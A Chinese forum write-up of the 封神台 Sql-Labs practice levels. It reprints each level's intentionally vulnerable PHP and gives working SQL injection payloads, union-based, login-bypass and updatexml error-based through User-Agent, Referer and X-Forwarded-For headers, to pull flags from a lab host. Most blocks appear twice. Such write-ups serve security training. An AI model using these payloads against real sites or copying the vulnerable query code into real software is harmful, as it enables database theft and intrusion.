-
-
【封神台】Sql-Labs wp
-
发表于: 2021-8-5 13:44
-
过滤了单引号,万能密码登陆没用了,看到user_agent的head头中被安插在插入语句中,可以直接sqlmap跑*加包,或者第二种方法用burp跑出密码登陆,再UA中填updatexml来报错直接页面上显示uA中语句错误,第一种方法无脑,就不做了
账号和密码是admin和123456,看源码得知,必须登陆才能执行user-agent下面的语句,$row必须不为空,所以想要报错注入,就必须能登陆成功
length函数:
这个函数主要是用来测试字符串长度用,在盲注中是用来判断当前查询的字符串长度,例如数据库名,表名的长度。
substr函数:
用于分割字符串,将字符串分割成单个,配合ASCII码测试单个字符到底是什么字符。
ascii函数:
返回字符的ascii码,将字符转变为数字,将字符都转变为数字,可利用数字大小趋向的特性进行大小比较,从而迅速判断出准确的字符内容。
(1)、if(条件,满足条件的返回,不满足田间的返回)
(2)、sleep(X):休眠X秒
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='.$id;
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='.$id;
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from f.columns where table_schema=database() and table_name=0x6572726f725f666c6167;
//0x6572726f725f666c6167是error_flag的十六进制
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from f.columns where table_schema=database() and table_name=0x6572726f725f666c6167;
//0x6572726f725f666c6167是error_flag的十六进制
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='\''.$id.'\'';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='\''.$id.'\'';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union all select 1,2,flag from error_flag %23;
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union all select 1,2,flag from error_flag %23;
sername = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='(\''.$id.'\')';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
sername = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='(\''.$id.'\')';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1') union all select 1,2,flag from error_flag %23;
http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1') union all select 1,2,flag from error_flag %23;
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=("'.$id.'")';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=("'.$id.'")';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union all select 1,2,flag from error_flag %23;
http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union all select 1,2,flag from error_flag %23;
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
username=admin&password=as4dsa2dsad2a3' union all select 1,2,3 limit 1,1#
username=admin&password=as4dsa2dsad2a3' union all select 1,2,3 limit 1,1#
username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1#
username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1#
username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1#
username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1#
username=admin&password=as4dsa2dsad2a3' union all select 1,2,flag from flag limit 1,1#
username=admin&password=as4dsa2dsad2a3' union all select 1,2,flag from flag limit 1,1#
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =("'.$username.'") and password=("'.$password.'")';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =("'.$username.'") and password=("'.$password.'")';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
username=admin&password=as4dsa2dsad2a3") union all select 1,2,flag from flag limit 1,1#
username=admin&password=as4dsa2dsad2a3") union all select 1,2,flag from flag limit 1,1#
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_USER_AGENT'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));echo '成功登录';
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_USER_AGENT'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));echo '成功登录';
'or updatexml(1,concat(0x7e,user()),1),1)#
'or updatexml(1,concat(0x7e,user()),1),1)#
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_REFERER'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO refer (`refer`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));echo '成功登录';
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_REFERER'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO refer (`refer`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));echo '成功登录';
Referer: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
Referer: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
function getip(){ if (getenv('HTTP_CLIENT_IP'))
{
$ip = getenv('HTTP_CLIENT_IP');
}
elseif (getenv('HTTP_X_FORWARDED_FOR'))
{
$ip = getenv('HTTP_X_FORWARDED_FOR');
}
elseif (getenv('HTTP_X_FORWARDED'))
{
$ip = getenv('HTTP_X_FORWARDED');
}
elseif (getenv('HTTP_FORWARDED_FOR'))
{
$ip = getenv('HTTP_FORWARDED_FOR');
}
elseif (getenv('HTTP_FORWARDED'))
{
$ip = getenv('HTTP_FORWARDED');
}
else
{
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}$username = $_POST['username'];
$password = $_POST['password'];
$ip = getip();
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));echo '成功登录';
function getip(){ if (getenv('HTTP_CLIENT_IP'))
{
$ip = getenv('HTTP_CLIENT_IP');
}
elseif (getenv('HTTP_X_FORWARDED_FOR'))
{
$ip = getenv('HTTP_X_FORWARDED_FOR');
}
elseif (getenv('HTTP_X_FORWARDED'))
{
$ip = getenv('HTTP_X_FORWARDED');
}
elseif (getenv('HTTP_FORWARDED_FOR'))
{
$ip = getenv('HTTP_FORWARDED_FOR');
}
elseif (getenv('HTTP_FORWARDED'))
{
$ip = getenv('HTTP_FORWARDED');
}
else
{
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}$username = $_POST['username'];
$password = $_POST['password'];
$ip = getip();
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));echo '成功登录';
X-FORWARDED-FOR: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
X-FORWARDED-FOR: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id='.$id;
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$news = $row['news'];
}if($news!== ''){
echo '有数据';}
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id='.$id;
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$news = $row['news'];
}if($news!== ''){
echo '有数据';}
length(字符串内容)length(字符串内容)SUBSTR(字符串内容,从哪截取,截取多长)SUBSTR(字符串内容,从哪截取,截取多长)ascii(填入字符)ascii(填入字符)[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2021-8-5 13:46
被孤桜懶契编辑
,原因:
|
|
|---|---|
